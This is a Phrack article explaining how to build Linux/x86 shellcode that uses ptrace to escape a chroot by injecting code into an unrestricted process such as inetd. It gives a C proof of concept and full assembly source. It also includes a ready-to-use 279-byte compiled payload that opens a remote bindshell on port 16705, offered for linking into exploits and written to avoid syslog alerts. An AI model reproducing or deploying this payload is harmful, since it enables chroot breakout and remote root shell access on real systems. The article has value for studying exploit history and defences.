|
==Phrack Inc.== Volume 0x0b, Issue 0x3b, Phile #0x0c of 0x12 |=---------------=[ Building ptrace injecting shellcodes ]=--------------=| |=-----------------------------------------------------------------------=| |=------------=[ anonymous author <p59_0c@author.phrack.org ]=-----------=| ---[ Contents 1 - Testing environment 2 - Why we should do ptrace injecting shellcode ? 3 - What does ptrace 3.1 - Requirement 3.2 - How does the library make the call 4 - Injecting code in a process - C code 4.1 - The stack is our friend 4.2 - Code to inject 4.3 - Our first C code 5 - First try to shellcodize it 5.1 When you need somebody to trace 5.2 Waiting (for love ?) 5.3 Registers where are you ? 5.4 Upload in progress 5.5 You'll be a man, my son. 6 - References and greetings ---[ 1 - Testing environment First of all, I've to set the rules for my playground. I used to test all these techniques under linux 2.4.18 i386 with executable stack. They may work under any linux releases, excepted the nonexec-stack ones, due to the concept of the injection (On the stack). By modifying a little bit these techniques it shoud be possible to exploit any OS on any architecture, as long they support the ptrace() system call. ---[ 2 - Why we should do ptrace injecting shellcode ? Starting in some of the 2.4.x kernel series, linux chroot is no longer breakable by the good old well known method.(using chroot() tricks). The linux chroot now really restricts the VFS usage, and a root shell on a chrooted process may (theorically) be unusable for a cracker, except by modifying (by example on a FTP server) the ftp tree. An uid of zero may allow the cracker to do some others things that are not restricted by the VFS on a standard 2.4 kernel : - Changing some kernel parameters (time of day, etc...). - Insert a kernel module (may be exploitable, but it is very hard to include a shellcode due to space restriction. It had been used in a wuftpd 2.5 exploit, by uploading a kernel backdoor and a staticaly linked insmod. That's way much complicated to do successfuly than our tricks. ) - Somes VFS related thingies like using opens file descriptors. - Debug any process on the system. There is a huge vulnerability of the chroot system, which is corrected by some security patches available on the net. A root user in a chrooted env is still ptrace-capable on any process on the system (except init, of course). This technique is also generic (doesn't use open fd's, may be usable even on non root processes) and a chrooted apache may infect fingerd as an exemple. Here comes the idea to create a ptrace shellcode. We may, with this shellcode, trace an unrestricted process and inject into it a second shellcode, which runs a bindshell in our example. Here is what we want for this ptrace shellcode : -Relative small size (must be usable as a real shellcode). I saw in some exploits (like the 7350wu one) a little smaller shellcode doing a read (0,%esp,shellcode_len), and I thought it as a really "good-idea (TM)" to inject a big shellcode. So this parameter is not so critical. -Must be runable more than once in a short laps of time. If the first exploitation attempt failed (e.g. port already binded), the traced process must not crash. (in the wuftpd case, if we inject malicious code in inetd, it should let it listen for ftp connections) -The selection of the target process may be most of the time the parent process (inetd for a ftp server) which usually has full root access. We can also try all pid, starting from 2, until we find something traceable. -We can't lookup into /proc for any process to trace. These rules can be fulfilled, and are enough for most exploitation cases, I think. ---[ 3 - What does ptrace 3.1 - Requirement You may know that the ptrace system call has been created for tracing and debugging process within usermode. A process may be ptraced by only one process at a time, and only by a pid owned by the same user, or by root. Under linux, ptrace commands are all implemented by the ptrace() function/syscall, with four parameters. The prototype is there : #include <sys/ptrace.h> long int ptrace(enum __ptrace_request request, pid_t pid, void * addr, void * data) 'request' is a symbolic constant declared in sys/ptrace.h . We shall use those : PTRACE_ATTACH : Attach to the process pid. PTRACE_DETACH : ugh, Detach from the process pid. Never forget to do that, or your traced process will stay in stopped mode, which is unrecoverable remotely. PTRACE_GETREGS : This command copy the process registers into the struct pointed by data (addr is ignored). This structure is struct user_regs_struct defined as this, in asm/user.h : struct user_regs_struct { long ebx, ecx, edx, esi, edi, ebp, eax; unsigned short ds, __ds, es, __es; unsigned short fs, __fs, gs, __gs; long orig_eax, eip; unsigned short cs, __cs; long eflags, esp; unsigned short ss, __ss; }; PTRACE_SETREGS : This command has the opposite meaning of PTRACE_GETREGS, with same arguments PTRACE_POKETEXT : This command copies 32 bits from the address pointed by data in the addr address of the traced process. This is equivalent to PTRACE_POKEDATA. An important thing when you attach a pid is that you have to wait for the traced process to be stopped, and so have to wait for the SIGCHLD signal. wait(NULL) does this perfectly (implemented in the shellcode by waitpid). 3.2 - How does the library make the call As we are writing asm code, we have to know how to call directly the ptrace system call. Little tests may show us the way the library uses to wrap the syscalls, and simply : eax is SYS_ptrace (26 decimal) ebx is request (e.g. PTRACE_ATTACH is 16) ecx is pid edx is addr esi is data in error case, -1 is stored in eax. ---[ 4 - Injecting code in a process - C code 4.1 - The stack is our friend I've seen some injection mechanism used by some ptrace() exploits for linux, which injected a standard shellcode into the memory area pointed by %eip. That's the lazy way of doing injection, since the target process is screwed up and can't be used again. (crashes or doesn't fork) We have to find another way to execute our code in the target process. That's what I was thinking and I found this : 1- Get the current eip of the process, and the esp. 2- Decrement esp by four 3- Poke eip address at the esp address. 4- Inject the shellcode into esp - 1024 address (Not directly before the space pointed by esp, because some shellcodes use the push instruction) 5- Set register eip as the value of esp - 1024 6- Invoke the SETREGS method of ptrace 7- Detach the process and let it open a root shell for you :) The reason of non-usability on systems with nonexec stack is that the shellcode is uploaded onto the stack. That's a /feature/, not a bug. I've heard of methods saving the memory context of the traced process, uploading shellcode, wait it to finish (usually after the fork) and then restoring the old state of the traced process. That's a way, but I don't think it is really efficient because modern non-exec patches also avoid ptracing of unrestricted processes. (At least grsec does that.) The target stack may look as this : [DOWN][program stack][old_eip][craps for 1024 bytes][shellcode][UP] ^> Original esp points here new eip<^ new<^>esp points here Something important to do before the exploitation is to put two nops bytes before the shellcode. Reason is simple : if ptrace has interrupted a syscall being executed, the kernel will subtract two bytes from eip after the PTRACE_DETACH to restart the syscall. 4.2 - Code to inject The code to inject has to work peacefully with the stack we have set up for it : it may fork(), and let the original process continue its job. The new process may launch a bindshell ! Here's the code of s1.S , compilable with gcc : /* all that part has to be done into the injected process */ /* in other word, this is the injected shellcode */ .globl injected_shellcode injected_shellcode: // ret location has been pushed previously nop nop pusha // save before anything xor %eax,%eax mov $0x02,%al //sys_fork int $0x80 //fork() xor %ebx,%ebx cmp %eax,%ebx // father or son ? je son // I'm son //here, I'm the father, I've to restore my previous state father: popa ret /* return address has been pushed on the stack previously */ // code finished for father son: /* standard shellcode, at your choice */ .string "" local@darkside:~/dev/ptrace$ gcc -c s1.S Explanations : The first two nops are the nops I've discussed just before, because in my final shellcode I choose to decrement the destination buffer source address by two. The pusha saves all the registers on the stack, so the process may restore them just after the fork. (I say eax and ebx) If the return value of fork is zero, this is the son being executed. There we insert any style of shellcode. If the return value is not zero (but a pid), restore the registers and the previously saved eip. The program may continue as if nothing has happened. 4.3 - Our first C code Lot of theory, now a little practical example. Here is a program which will fork, attach its son, inject it the code, let it run and after kill it. So, there is p2.c : #include <stdio.h> #include <sys/ptrace.h> #include <linux/user.h> #include <signal.h> typedef long int pid_t; void injected_shellcode(); char *hello_shellcode= "\x31\xc0\xb0\x04\xeb\x0f\x31\xdb\x43\x59" "\x31\xd2\xb2\x0d\xcd\x80\xa1\x78\x56\x34" "\x12\xe8\xec\xff\xff\xff\x48\x65\x6c\x6c" "\x6f\x2c\x57\x6f\x72\x6c\x64\x20\x21" ; /* Prints hello. What a deal ! */ char *shellcode; int child(){ while(1){ write(2,".",1); sleep(1); } return 0; } int father (pid_t pid){ int error; int i=0; int ptr; int begin; struct user_regs_struct data; if (error=ptrace(PTRACE_ATTACH,pid,NULL,NULL)) perror("attach"); waitpid(pid,NULL,0); if(error=ptrace(PTRACE_GETREGS,pid,&data,&data)) perror("getregs"); printf("%%eip : 0x%.8lx\n",data.eip); printf("%%esp : 0x%.8lx\n",data.esp); data.esp -= 4; ptrace(PTRACE_POKETEXT,pid,data.esp,data.eip); ptr=begin=data.esp-1024; printf("Inserting shellcode into %.8lx\n",begin); data.eip=(long)begin+2; ptrace(PTRACE_SETREGS,pid,&data,&data); while(i<strlen(shellcode)){ ptrace(PTRACE_POKETEXT,pid,ptr,(int)* (int *) (shellcode+i)); i+=4; ptr+=4; } ptrace (PTRACE_DETACH,pid,NULL,NULL); return 0; } int main(int argc,char **argv){ pid_t pid=0; if(argc>1) pid=atoi(argv[1]); shellcode=malloc( strlen((char*) injected_shellcode) + strlen(hello_shellcode) + 4); strcpy(shellcode,(char *) injected_shellcode); strcat(shellcode,(char *) hello_shellcode); printf("p2 : trying to launch shellcode on forked process\n"); if(pid==0) pid=fork(); if (pid){ printf("I'm the father\n"); sleep(2); father(pid); sleep(2); kill(pid,9); wait(NULL); }else{ printf("I'm the child\n"); child(); } return 0; } Compile all that with gcc -o p2 p2.c s1.S and admire my cut & paste skillz local@darkside:~/dev/ptrace$ ./p2 p2 : trying to launch shellcode on forked process I'm the father I'm the child ...%eip : 0x400c0a11 %esp : 0xbffff470 Inserting shellcode into bffff06c .Hello,World !. It really happened. the .... process forked and then printed "Hello, world!". 5 - First try to shellcodize it Before doing it, we have to remember our rules. I'll program it without really optimizing it in size (I let bighawk or pr1 do that) but designing with pre-compiler conditional assemble. gcc -DLONG for a very careful shellcode (checks etc...) gcc -DSHORT for a very tiny shellcode (which does the minimum but unsafe). So, if size really matters, we can exit(0) simply by jumping anywhere, or if size does not matter at all, we can make draconian tests. I will use at&t syntax, compilable with gcc. If you don't like it, a good (and big) awk script may do the trick. 5.1 When you need some body to trace A basic approach is first to set the stack pointer to a high value. We can't be certain that the stack pointer is not less than current eip (in the case of a stack based overflow). The easier (and laziest) way to do this is to set esp to 0xbffffe04. This esp value works on nearly all linux/x86 boxes I've seen, and is near the stack bottom, but not too much, and doesn't contain a zero. Then, we get the ppid process with the getppid() syscall. Next, first try to attach it. If the attach fails, 99% chances are that the ppid is init. In this case, we increment the pid until we can attach something. (Warning, debugging this part of code is not easy at all. When you trace a process, you become its ppid. In this case, the shellcode will attach your debugger and a mutual deadlock will appear. Who told "A cool/good anti-debugger technique ?") So I included a test for the DEBUG_PID preprocessor variable. Put there whatever pid you want to inject something in. Note that the pid is put on the stack, at the 12(%ebp) place. That's useful because we will need it in nearly all system calls. 5.2 Waiting (for love ?) Now, little shellcode has to wait for its child. There are two ways of doing this : - waitpid(pid,NULL,NULL); - big big loop; As I didn't success to make a reasonably short (in time) loop smaller in size than the syscall, the code contains only the system call. 5.3 Registers where are you ? The target process is ready to be modified, but the first thing to do with it is to extract the registers. The ebp register is saved into esi, and then esi is incremented by 16. It will be the "data" argument of the ptrace call. So, after the syscall, target registers are beginning at 16(%ebp). Interesting registers are : esp : 76(%ebp) eip : 64(%ebp) The register tricks I have described before are in the shellcode source, but are not so complicated, including the "push"-like instruction to push the old eip address. 5.4 Upload in progress "Uploading" the shellcode, or injecting it in the target process, is just a little loop. The shellcode itself is not really clear because the loop counter used is esp. We set esp with the value specified in macro SHELLCODELEN. In edi, we set the memory address of the injected shellcode in the current process. Edx contains the target address, previously decremented of two conforming to our first note about this. As after the interrupt call, eax must be zero, we can safely use it to test if esp reached the final state. 5.5 You'll be a man, my son. We can safely detach the process now. If we forget to detach (laziness or simply spaceless) the process will remain in interrupted state, which needs a SIGCONT to launch our bindshell. After this hard work, shellcode can exit, simply by the exit() syscall which usually doesn't alarm inetd or such and doesn't create any alarming note in syslog. (for the cute version, "ret" may be enough to segfault and so close the process.) The bindshell I included binds port 0x4141. Remember that two fast executions of the shellcode may block the port 0x4141 for minutes. That was quite annoying while coding this. The shellcode hasn't been optimized in size yet. You can compile the attached code with gcc -DLONG -c -o injector.o injector.S and linking it with your favourite exploit. Code is 100% null-chars free. I didn't look for newlines, carriage returns, spaces, percents, 0xff, etc... ---[ 6 - References and greetings Man page of ptrace() is cool, lucid, informative, and so on. Intel documentation book 2 : the instructions was an useful book full of 1-byte-instructions-which-does-everything. Special greets to the other guys from minithins.net, UNF people, my tender girlfriend and to at&t who made their own cool asm syntax. Special thanks too to the channels #fr,#ircs,#!w00nf,#segfault,#unf for their special support, and especially to double-p ,fozzy and OUAH who corrected my lame english and gave me some advices. <injector.s> /* INJECTOR.S VERSION 1.0 */ /* Injects a shellcode in a process using ptrace system call */ /* Tested on : linux 2.4.18 */ /* NOT SIZE-OPTIMIZED YET */ #define SHELLCODELEN 30 /* That is, size of (the injected shellcode + bindshell)/4 */ #ifndef SHORT #define LONG #endif #ifdef LONG #undef SHORT #endif .text .globl shellcode .type shellcode,@function shellcode: /* injector begins here */ mov $0xbffffe04,%esp /* first thing, we have to find our ppid */ xor %eax,%eax mov $64,%al /* sys_getppid */ int $0x80 #ifdef DEBUG_PID mov $DEBUG_PID,%ax #endif /* put it on the stack */ mov %esp,%ebp /* save the stack in stack pointer */ mov %eax,12(%ebp) /* save the pid there */ /* now we have to do a ptrace */ redo: xor %eax,%eax mov $26,%al /* sys_ptrace */ mov 12(%ebp),%ecx mov %eax,%ebx mov $0x10,%bl /* PTRACE_ATTACH */ int $0x80 /* do ptrace(PTRACE_ATTACH,getppid(),NULL,NULL); */ xor %ebx,%ebx cmp %eax,%ebx je good /* we are not leet enough, or ppid is init */ inc %ecx mov %ecx,12(%ebp) jmp redo good: /* now we have to do a waitpid(pid,NULL,NULL) */ mov %eax,%edx /* NULL */ mov %ecx,%ebx /* pid */ mov %edx,%ecx /* NULL */ mov $7,%al /* SYS_waitpid */ int $0x80 getregs: /* now get its registers */ xor %eax,%eax /* Should waitpid return 0 ? never ;) */ xor %ebx,%ebx mov %ebp,%esi add $16,%esi /* 16 up of the stack pointer */ mov $12,%bl /* %ebx is zero, PTRACE_GETREGS */ mov 12(%ebp),%ecx /* pid */ mov $26,%al /* %eax is zero. */ /* %edx doesn't contain anything since PTRACE_GETREGS doesn't use addr */ int $0x80 /* so now we have registers in 16(%ebp) */ /* two interresting : %eip and %esp */ /* %eip : (16+48)(%ebp) */ /* %esp : (16+60)(%ebp) */ /* rq : 12(%ebx) contains ppid */ /* 8(%ebx) will contain the eip */ custom_push: sub $4,76(%ebp) /* dec the esp */ mov 76(%ebp),%edi /* put it in our temp eip */ sub $1036,%di mov %edi,8(%ebp) /* that's the address where we */ /* shall start to install our code */ /* we need to push the eip at top of the stack */ mov $26,%al mov $4,%bl /* PTRACE_POKETEXT*/ mov 12(%ebp),%ecx /*ppid */ mov 76(%ebp),%edx /* esp we have decremented */ mov 64(%ebp),%esi /* old eip */ int $0x80 /* what a work for push %eip */ mov %edi ,64(%ebp) /* eip = our code nah, %edi == 8(%ebp) */ /* now put our cool registers set */ setregs: xor %eax,%eax xor %ebx,%ebx mov $26,%al mov $13,%bl /* PTRACE_SETREGS*/ /* ppid always set so %ecx */ /* %edx ignored */ mov %ebp,%esi add $16,%esi int $0x80 /* registers have been updated. now inject the shellcode */ /* %edi : location in memory where we put the shellcode */ jmp start goback: /* push on the stack the address of the shellcode to inject */ mov %edi,%edx /* addr */ dec %edx dec %edx /* returning from syscall, eip goes 2 before current eip */ /* with this trick, it goes on 2 nops */ pop %edi /* data */ xor %eax,%eax mov $SHELLCODELEN,%al mov %eax,%esp mov $4,%bl loop: mov $26,%al mov 12(%ebp),%ecx mov (%edi),%esi int $0x80 dec %esp add $4,%edx /* target shellcode */ add $4,%edi /* local shellcode, source */ cmp %esp,%eax /* Len > 0 ? */ jne loop detach: mov $26,%al xor %ebx,%ebx mov $0x11,%bl /* PTRACE_DETACH */ mov 12(%ebp),%ecx /* pid */ //xor %edx,%edx //xor %esi,%esi int $0x80 /* Now we can exit */ failed: #ifdef LONG xor %eax,%eax /* exit silently */ mov %eax,%ebx mov $1,%al /* sys_exit */ int $0x80 /* die in peace, poor child */ #endif #ifndef LONG ret #endif start: call goback /* all that part has to be done into the injected process */ /* in other word, this is the injected shellcode */ // ret location has been pushed previously nop nop pusha // save before anything by saving registers xor %eax,%eax mov $0x02,%al //sys_fork int $0x80 //fork() xor %ebx,%ebx cmp %eax,%ebx // father or son ? je son // I'm son //here, I'm the father, I've to restore my previous state father: popa ret /* code finished for the father */ son: /* standard shellcode, at your choice */ /* Bind shellcode */ lnx_bind: xor %eax,%eax cdq /* %edx= 0 */ push %edx /* IPPROTO_TCP */ inc %edx /* SOCK_STREAM */ mov %edx,%ebx /* socket() */ push %edx inc %edx /* AF_INET */ push %edx mov %esp,%ecx mov $102,%al int $0x80 mov %eax,%edi /* Save the socket in %edi */ cdq /* %edx= sign of %eax = 0 */ inc %ebx /* bind */ /* was 1, become 2 */ push %edx /* 0.0.0.0 addr */ /*change \/ here */ push $0x4141ff02 /* here, change the 0x4141 for the port */ /* /\ */ mov %esp,%esi /* save the address of sockaddr in %esi */ push $16 /* Size of this shit */ //$16 push %esi /* struct sockaddr * */ push %edi /* socket number */ mov %esp,%ecx /* bind() */ mov $102,%al int $0x80 /* Erf, I use the previous data on the stack, they are even good enough */ inc %ebx /*3...*/ inc %ebx /*4 */ mov $102,%al int $0x80 /* Listen(fd,somehug) (somehuge always > 0 so it's good) */ push %esp /* Len */ push %esi /* sockaddr* */ push %edi /* socket */ inc %ebx /* 5 */ mov %esp,%ecx mov $102,%al int $0x80 /* accept */ xchg %eax,%ebx /* Save our precious file descriptor */ pop %ecx /* take the value of %edi, that's usualy %ebx-1 */ duploop: mov $63,%al /* dup2 */ int $0x80 dec %ecx cmp %ecx,%edx jle duploop //jnl loop /* For each file descriptor before %ebx, dup2() it */ /* Std lnx_bin_sh_1 shellcode */ push %edx push $0x68732f6e push $0x69622f2f mov %esp,%ebx push %edx push %ebx mov %esp,%ecx mov $11, %al int $0x80 .string "" </injector.s> <injector.h> // compiled with -DLONG // binds to port 16705 char injector_lnx[]= "\xbc\x04\xfe\xff\xbf\x31\xc0\xb0\x40\xcd" "\x80\x89\xe5\x89\x45\x0c\x31\xc0\xb0\x1a" "\x8b\x4d\x0c\x89\xc3\xb3\x10\xcd\x80\x31" "\xdb\x39\xc3\x74\x06\x41\x89\x4d\x0c\xeb" "\xe7\x89\xc2\x89\xcb\x89\xd1\xb0\x07\xcd" "\x80\x31\xc0\x31\xdb\x89\xee\x83\xc6\x10" "\xb3\x0c\x8b\x4d\x0c\xb0\x1a\xcd\x80\x83" "\x6d\x4c\x04\x8b\x7d\x4c\x66\x81\xef\x0c" "\x04\x89\x7d\x08\xb0\x1a\xb3\x04\x8b\x4d" "\x0c\x8b\x55\x4c\x8b\x75\x40\xcd\x80\x89" "\x7d\x40\x31\xc0\x31\xdb\xb0\x1a\xb3\x0d" "\x89\xee\x83\xc6\x10\xcd\x80\xeb\x34\x89" "\xfa\x4a\x4a\x5f\x31\xc0\xb0\x1e\x89\xc4" "\xb3\x04\xb0\x1a\x8b\x4d\x0c\x8b\x37\xcd" "\x80\x4c\x83\xc2\x04\x83\xc7\x04\x39\xe0" "\x75\xec\xb0\x1a\x31\xdb\xb3\x11\x8b\x4d" "\x0c\xcd\x80\x31\xc0\x89\xc3\xb0\x01\xcd" "\x80\xe8\xc7\xff\xff\xff\x90\x90\x60\x31" "\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xc3\x74" "\x02\x61\xc3\x31\xc0\x99\x52\x42\x89\xd3" "\x52\x42\x52\x89\xe1\xb0\x66\xcd\x80\x89" "\xc7\x99\x43\x52\x68\x02\xff\x41\x41\x89" "\xe6\x6a\x10\x56\x57\x89\xe1\xb0\x66\xcd" "\x80\x43\x43\xb0\x66\xcd\x80\x54\x56\x57" "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0" "\x3f\xcd\x80\x49\x39\xca\x7e\xf7\x52\x68" "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" "\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" ; /*size :279 */ </injector.h>